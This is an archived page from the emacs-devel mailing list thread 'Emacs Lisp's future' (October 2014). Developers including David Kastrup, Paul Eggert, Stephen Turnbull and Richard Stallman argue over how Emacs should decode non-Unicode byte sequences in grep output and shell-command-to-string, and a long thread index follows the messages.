Sounds like a recipe for a non-debuggable security nightmare.  Tampering
with content that Emacs does not know the meaning of, and doing so
differently in non-interactive use is a recipe for making Emacs do
unexpected things.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 14:36                                                                                                 ` Eli Zaretskii
@ 2014-10-15 14:51                                                                                                   ` David Kastrup
  2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-15 14:51 UTC (permalink / raw)
  To: emacs-devel

Eli Zaretskii <eliz@gnu.org> writes:

>> From: "Stephen J. Turnbull" <stephen@xemacs.org>
>> Eli Zaretskii writes:
>
>>  > My point is that those other projects need to learn from Emacs first.
>> 
>> Could be you're right, but sadly, I doubt anyone is going to bother.
>
> Too bad.

With regard to GUILE, not learning from Emacs before taking over its
multilingual support is not really much of an option.  I rather doubt
that the current "fair is foul, and foul is fair" chants will be
sufficient for convincing existing users to abandon the evil encodings
they have been comfortable dabbling in so far due to the forbidden arts
of Emacs.

"Be thankful you can no longer avail yourself of this tool for this
purpose" works better in religious settings.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 14:36                                                                                                 ` Eli Zaretskii
  2014-10-15 14:51                                                                                                   ` David Kastrup
@ 2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 16:57 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: eggert, emacs-devel

Eli Zaretskii writes:

 > You assume that Grep and the terminal will not choke on the
 > non-Unicode characters.  There's no basis for such an assumption.

No basis at all.  But that's not what I'm assuming.  Just like you
(and Emacs itself, which already has several files containing such
non-Unicode characters), I'm simply assuming that GIGO will cause no
harm.

The difference is that in the longer run I plan to remove the problem
by using the PUA, which you say can't be done in Emacs.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
  2014-10-15  9:20                                                                                         ` Eli Zaretskii
@ 2014-10-15 17:18                                                                                         ` Paul Eggert
  2014-10-15 18:39                                                                                           ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-15 17:18 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Eli Zaretskii, emacs-devel

On 10/15/2014 12:17 AM, Stephen J. Turnbull wrote:
>   > It's perfectly fine for users to try "M-x grep -r" at home.  It's
>   > not going to hurt them.
>
> That's true for "hurt" == "must call 911".
It's not going to trash their files, or corrupt their displays, or steal 
their passwords, or do anything that's going to hurt them.  Let's not be 
fearmongers here.  The current behavior is useful and easy to explain 
and understand, and people use it a lot, and in that sense it is not a 
"bug".  Although the behavior could be changed to better handle the use 
cases you're thinking about, that is a different matter, one that would 
require nontrivial work to do, and one that shouldn't obstruct the 
common current usage.

>
>  > Conversely, it appears that you did not read the file
>  > admin/notes/unicode carefully;
>
> "It appears that you have not studied Unicode carefully", as there is
> nothing in that file that suggests anything but work is involved

Nontrivial work needs to be done, and this is a technical barrier as 
nobody (including you) has had the time to do the work.  It does still 
appear, though, that you haven't read admin/notes/unicode carefully 
enough, as a simple language-tag-per-file approach won't suffice for 
src/msdos.c, etc/HELLO, lisp/language/tibetan.el, etc., and still more 
work would need to be done for those files, the details of which have 
never (as far as I know) been discussed.  It's not clear how my studying 
Unicode more carefully would help in that effort.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 17:18                                                                                         ` Paul Eggert
@ 2014-10-15 18:39                                                                                           ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 18:39 UTC (permalink / raw)
  To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel

Paul Eggert writes:

 > The current behavior is useful and easy to explain and understand,
 > and people use it a lot,

Granted.

 > and in that sense it is not a "bug".

I give up.  I can't imagine successfully communicating with someone
who defines "not a bug" that way.






^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 14:43                                                                             ` David Kastrup
@ 2014-10-16 18:12                                                                               ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-16 18:12 UTC (permalink / raw)
  To: David Kastrup
  Cc: mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, eliz,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

I presented three solutions for handling shell-command-to-string, but
I was confusing it with another function which is a command.
shell-command-to-string is only used in Lisp programs, and probably
those programs will not show that text to a user except in error messages.

Perhaps it should always do strict decoding.

Can you present a real example of using shell-command-to-string
that really needs to do flexible decoding?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

end of thread, other threads:[~2014-10-16 18:12 UTC | newest]

Thread overview: 261+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2014-09-17  7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen
2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
2014-09-17 16:15   ` James Cloos
2014-09-17 17:53     ` Stefan Monnier
2014-09-17 21:46       ` Stefan Monnier
2014-09-18  1:09         ` James Cloos
2014-09-18  7:12         ` Helmut Eller
2014-09-18  7:46         ` Thorsten Jolitz
2014-09-18 18:59       ` Johan Bockgård
2014-09-18 21:01       ` Sam Steingold
2014-09-19  0:56         ` Stefan Monnier
2014-09-19 12:24           ` Sam Steingold
2014-09-26 13:43 ` Robin Templeton
2014-09-26 14:15   ` David Kastrup
2014-09-26 14:45     ` Dmitry Antipov
2014-09-26 15:05       ` David Kastrup
2014-09-27  8:44         ` Stephen J. Turnbull
2014-09-27  8:59           ` David Kastrup
2014-09-27 15:30             ` Stephen J. Turnbull
2014-09-26 15:07       ` Eli Zaretskii
2014-09-26 15:21         ` David Kastrup
2014-09-27  8:35         ` Stephen J. Turnbull
2014-09-27  8:49           ` David Kastrup
2014-09-27  9:32           ` Eli Zaretskii
2014-09-27 10:37             ` Stephen J. Turnbull
2014-09-27 11:13               ` David Kastrup
2014-09-27 12:00                 ` Eli Zaretskii
2014-09-27 14:04                   ` Stefan Monnier
2014-09-27 14:24                     ` David Kastrup
2014-09-27 15:24                       ` Stefan Monnier
2014-09-27 15:41                         ` David Kastrup
2014-09-27 15:57                           ` Stefan Monnier
2014-09-27 16:25                             ` David Kastrup
2014-09-27 17:23                               ` Stefan Monnier
2014-09-28 23:22                                 ` Richard Stallman
2014-09-29  1:33                                   ` Stefan Monnier
2014-09-29 20:48                                     ` Richard Stallman
2014-10-05  7:53                                   ` Mark H Weaver
2014-10-05  9:01                                     ` David Kastrup
2014-10-05 10:43                                     ` Stephen J. Turnbull
2014-10-05 11:10                                       ` David Kastrup
2014-10-05 11:56                                         ` Stephen J. Turnbull
2014-10-05 14:30                                       ` Mark H Weaver
2014-10-05 15:48                                         ` Stephen J. Turnbull
2014-10-05 18:29                                           ` Mark H Weaver
2014-10-05 21:49                                     ` Richard Stallman
     [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
2014-10-06  3:18                                       ` Stephen J. Turnbull
2014-10-06 19:15                                         ` Richard Stallman
2014-10-07  0:46                                           ` Stephen J. Turnbull
2014-10-07 14:04                                             ` Richard Stallman
2014-10-07 15:43                                               ` Stephen J. Turnbull
2014-10-07 16:01                                                 ` David Kastrup
2014-10-07 18:15                                                   ` Stephen J. Turnbull
2014-10-07 16:16                                                 ` David Kastrup
2014-10-10 10:09                                           ` Thien-Thi Nguyen
2014-10-06  6:21                                       ` Mark H Weaver
2014-10-06 15:08                                         ` Eli Zaretskii
2014-10-06 15:33                                           ` David Kastrup
2014-10-06 16:24                                             ` Eli Zaretskii
2014-10-06 16:40                                               ` David Kastrup
2014-10-06 17:04                                               ` Stephen J. Turnbull
2014-10-06 17:34                                                 ` David Kastrup
2014-10-07  0:33                                                   ` Stephen J. Turnbull
2014-10-07 14:03                                                 ` Richard Stallman
2014-10-07 14:37                                                   ` Eli Zaretskii
2014-10-06 16:27                                           ` Mark H Weaver
2014-10-06 16:47                                             ` Eli Zaretskii
2014-10-06 17:31                                               ` David Kastrup
2014-10-06 17:58                                                 ` David Kastrup
2014-10-07  2:35                                                   ` Eli Zaretskii
2014-10-06 17:43                                               ` Stephen J. Turnbull
2014-10-06 17:53                                                 ` David Kastrup
2014-10-07  0:35                                                   ` Stephen J. Turnbull
2014-10-07 14:03                                                 ` Richard Stallman
2014-10-07 14:21                                                   ` David Kastrup
2014-10-07 15:16                                                     ` Andreas Schwab
2014-10-07 15:33                                                       ` David Kastrup
2014-10-07 15:42                                                         ` Andreas Schwab
2014-10-07 16:03                                                           ` David Kastrup
2014-10-07 16:16                                                             ` Andreas Schwab
2014-10-07 16:24                                                               ` David Kastrup
2014-10-07 16:31                                                                 ` Andreas Schwab
2014-10-07 16:52                                                                   ` David Kastrup
2014-10-07 17:38                                                                     ` Andreas Schwab
2014-10-08  0:47                                                                     ` Richard Stallman
2014-10-08  7:19                                                                       ` Eli Zaretskii
2014-10-08  7:37                                                                         ` David Kastrup
2014-10-06 18:04                                               ` Stefan Monnier
2014-10-06 23:00                                                 ` Mark H Weaver
2014-10-07  1:04                                                   ` Stefan Monnier
2014-10-07 14:03                                                 ` Richard Stallman
2014-10-07 14:04                                               ` Richard Stallman
2014-10-07 14:14                                                 ` David Kastrup
     [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
2014-10-07 15:15                                                   ` Mark H Weaver
2014-10-07 15:31                                                     ` Andreas Schwab
2014-10-07 15:40                                                       ` David Kastrup
2014-10-07 18:32                                                         ` Stephen J. Turnbull
2014-10-07 18:41                                                           ` David Kastrup
2014-10-07 16:34                                                       ` Mark H Weaver
2014-10-07 17:50                                                         ` David Kastrup
2014-10-07 18:36                                                           ` Mark H Weaver
2014-10-07 18:56                                                             ` David Kastrup
2014-10-07 19:21                                                               ` Stephen J. Turnbull
2014-10-07 23:11                                                               ` Mark H Weaver
2014-10-08  3:03                                                                 ` David Kastrup
2014-10-08 15:03                                                                   ` Mark H Weaver
2014-10-08 15:11                                                                     ` Eli Zaretskii
2014-10-08 15:54                                                                     ` David Kastrup
2014-10-09  3:26                                                                       ` Stephen J. Turnbull
2014-10-09  4:14                                                                         ` David Kastrup
2014-10-09  7:31                                                                           ` Stephen J. Turnbull
2014-10-09  8:05                                                                             ` David Kastrup
2014-10-11 18:50                                                                 ` Florian Weimer
2014-10-07 16:59                                                     ` Eli Zaretskii
2014-10-08  0:47                                                   ` Richard Stallman
2014-10-08  7:13                                                     ` Eli Zaretskii
2014-10-09  1:19                                                       ` Richard Stallman
2014-10-09  7:21                                                         ` Eli Zaretskii
2014-10-09  7:52                                                           ` David Kastrup
2014-10-09  8:41                                                             ` Eli Zaretskii
2014-10-09  9:22                                                               ` David Kastrup
2014-10-13  3:04                                                                 ` Mark H Weaver
2014-10-13  7:41                                                                   ` David Kastrup
2014-10-10 14:24                                                           ` Richard Stallman
2014-10-10 15:28                                                             ` Eli Zaretskii
2014-10-11  1:15                                                               ` Richard Stallman
2014-10-11  7:18                                                                 ` David Kastrup
2014-10-12  3:22                                                                   ` Richard Stallman
2014-10-11  7:18                                                                 ` Eli Zaretskii
2014-10-11 23:51                                                                   ` Mark H Weaver
2014-10-12  1:35                                                                     ` Stephen J. Turnbull
2014-10-12  8:38                                                                       ` David Kastrup
2014-10-12 12:16                                                                         ` Stephen J. Turnbull
2014-10-12 12:34                                                                           ` David Kastrup
2014-10-12 14:49                                                                             ` Stephen J. Turnbull
2014-10-12 16:50                                                                               ` David Kastrup
2014-10-13  2:40                                                                                 ` Mark H Weaver
2014-10-13  4:49                                                                                   ` Mark H Weaver
2014-10-13  3:08                                                                               ` Richard Stallman
2014-10-13  4:50                                                                                 ` Stephen J. Turnbull
2014-10-13  3:41                                                                               ` Richard Stallman
2014-10-12  5:37                                                                     ` Eli Zaretskii
2014-10-12  3:24                                                                   ` Richard Stallman
2014-10-12  5:47                                                                     ` Eli Zaretskii
2014-10-13  3:07                                                                       ` Richard Stallman
2014-10-13  3:38                                                                       ` Richard Stallman
2014-10-10 14:24                                                           ` Richard Stallman
2014-10-10 15:38                                                             ` Eli Zaretskii
2014-10-11  1:17                                                               ` Richard Stallman
2014-10-11  7:23                                                                 ` David Kastrup
2014-10-11  7:33                                                                 ` Eli Zaretskii
2014-10-12  3:22                                                                   ` Richard Stallman
2014-10-12  5:22                                                                     ` David Kastrup
2014-10-13  3:09                                                                       ` Richard Stallman
2014-10-13  3:44                                                                       ` Richard Stallman
2014-10-13  7:59                                                                         ` David Kastrup
2014-10-13  8:32                                                                           ` Eli Zaretskii
2014-10-13  9:20                                                                             ` David Kastrup
2014-10-12  5:44                                                                     ` Eli Zaretskii
     [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
2014-10-10 16:02                                                               ` Drew Adams
2014-10-10 16:10                                                                 ` Eli Zaretskii
2014-10-09  7:36                                                     ` David Kastrup
2014-10-10 14:25                                                       ` Richard Stallman
2014-10-07 14:21                                                 ` Andreas Schwab
2014-10-06 19:17                                             ` Richard Stallman
2014-10-06 19:59                                               ` David Kastrup
2014-10-07  0:10                                               ` Mark H Weaver
2014-10-07 14:04                                                 ` Richard Stallman
2014-10-11 18:34                                         ` Florian Weimer
2014-10-05 21:49                                     ` Richard Stallman
2014-10-06  3:34                                       ` Stephen J. Turnbull
2014-10-08  0:48                                         ` Richard Stallman
2014-10-08  2:09                                           ` Stephen J. Turnbull
2014-10-08  3:07                                             ` David Kastrup
2014-10-09  3:06                                               ` Stephen J. Turnbull
2014-10-09  3:44                                                 ` David Kastrup
2014-10-09  7:16                                                   ` Stephen J. Turnbull
2014-10-09  7:47                                                     ` Eli Zaretskii
2014-10-09 10:20                                                       ` Stephen J. Turnbull
2014-10-10 14:23                                                 ` Richard Stallman
2014-10-09  1:19                                             ` Richard Stallman
2014-10-09  3:56                                               ` Stephen J. Turnbull
2014-10-09  4:49                                                 ` Mike Gerwitz
2014-10-09  8:00                                                   ` Eli Zaretskii
2014-10-09 10:50                                                     ` Stephen J. Turnbull
2014-10-09 11:06                                                       ` David Kastrup
2014-10-09 17:23                                                         ` Richard Stallman
2014-10-09 17:37                                                           ` Eli Zaretskii
2014-10-12  3:24                                                             ` Richard Stallman
2014-10-12  5:54                                                               ` Eli Zaretskii
2014-10-13  3:10                                                                 ` Richard Stallman
2014-10-13  5:35                                                                   ` Stephen J. Turnbull
2014-10-13  6:02                                                                     ` Eli Zaretskii
2014-10-13  8:24                                                                       ` Stephen J. Turnbull
2014-10-13  8:58                                                                         ` David Kastrup
2014-10-13  9:45                                                                           ` Stephen J. Turnbull
2014-10-13 10:17                                                                             ` Uwe Brauer
2014-10-13 10:30                                                                             ` David Kastrup
2014-10-13  9:05                                                                         ` Eli Zaretskii
2014-10-13 10:05                                                                           ` Stephen J. Turnbull
2014-10-13 14:55                                                                     ` Paul Eggert
2014-10-13 17:18                                                                       ` Stephen J. Turnbull
2014-10-13 17:24                                                                         ` David Kastrup
2014-10-13 17:49                                                                           ` Stephen J. Turnbull
2014-10-13 18:04                                                                             ` David Kastrup
2014-10-13 19:19                                                                             ` Eli Zaretskii
2014-10-14  7:03                                                                               ` Stephen J. Turnbull
2014-10-14  7:41                                                                                 ` Eli Zaretskii
2014-10-14  7:58                                                                                   ` Eli Zaretskii
2014-10-14 10:06                                                                                     ` Stephen J. Turnbull
2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
2014-10-14  9:21                                                                                     ` Eli Zaretskii
2014-10-14 20:03                                                                                 ` Paul Eggert
2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
2014-10-15  5:54                                                                                     ` Paul Eggert
2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
2014-10-15  9:20                                                                                         ` Eli Zaretskii
2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
2014-10-15 11:57                                                                                             ` David Kastrup
2014-10-15 12:32                                                                                             ` Eli Zaretskii
2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
2014-10-15 14:36                                                                                                 ` Eli Zaretskii
2014-10-15 14:51                                                                                                   ` David Kastrup
2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
2014-10-15 17:18                                                                                         ` Paul Eggert
2014-10-15 18:39                                                                                           ` Stephen J. Turnbull
2014-10-14  2:11                                                                     ` Richard Stallman
2014-10-13  5:43                                                                   ` Eli Zaretskii
2014-10-14  2:09                                                                     ` Richard Stallman
2014-10-14  6:24                                                                       ` Eli Zaretskii
2014-10-14  7:48                                                                         ` David Kastrup
2014-10-15 13:16                                                                         ` Richard Stallman
2014-10-15 14:32                                                                           ` Eli Zaretskii
2014-10-15 14:43                                                                             ` David Kastrup
2014-10-16 18:12                                                                               ` Richard Stallman
2014-10-13  3:46                                                                 ` Richard Stallman
2014-10-09 11:27                                                       ` Eli Zaretskii
2014-10-10 14:23                                                   ` Richard Stallman
2014-10-10 14:23                                                 ` Richard Stallman
2014-10-10 20:41                                       ` Mark H Weaver
2014-10-10 21:56                                         ` Christopher Allan Webber
2014-10-10 22:56                                           ` Drew Adams
2014-10-11  1:17                                         ` Richard Stallman
2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
2014-09-27 19:33                       ` Robin Templeton
2014-09-28  7:17                         ` David Kastrup
2014-09-27 15:34                 ` Stephen J. Turnbull
2014-09-29 13:17             ` K. Handa
  -- strict thread matches above, loose matches on Subject: below --
2014-09-17  8:22 Emacs Lisp's future (was: Guile emacs thread (again)) Nic Ferrier
2014-09-17  2:57 Lally Singh
2014-09-17 11:01 ` Tom
2014-09-17 11:43 ` Richard Stallman
2014-09-17 14:21   ` Lally Singh
2014-09-11 16:29 Guile emacs thread (again) Christopher Allan Webber
2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
2014-09-16 16:03   ` Lennart Borgman
2014-09-17 18:24     ` Jorgen Schaefer
2014-09-17 19:25       ` Lally Singh
2014-09-18  2:07       ` Alexis
2014-09-18  8:43     ` Emilio Lopes
2014-09-16 16:09   ` Eli Zaretskii
2014-09-16 16:54   ` Lars Brinkhoff
     [not found] <"<54193A70.9020901"@member.fsf.org>

Code repositories for project(s) associated with this public inbox

	https://git.savannah.gnu.org/cgit/emacs.git

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).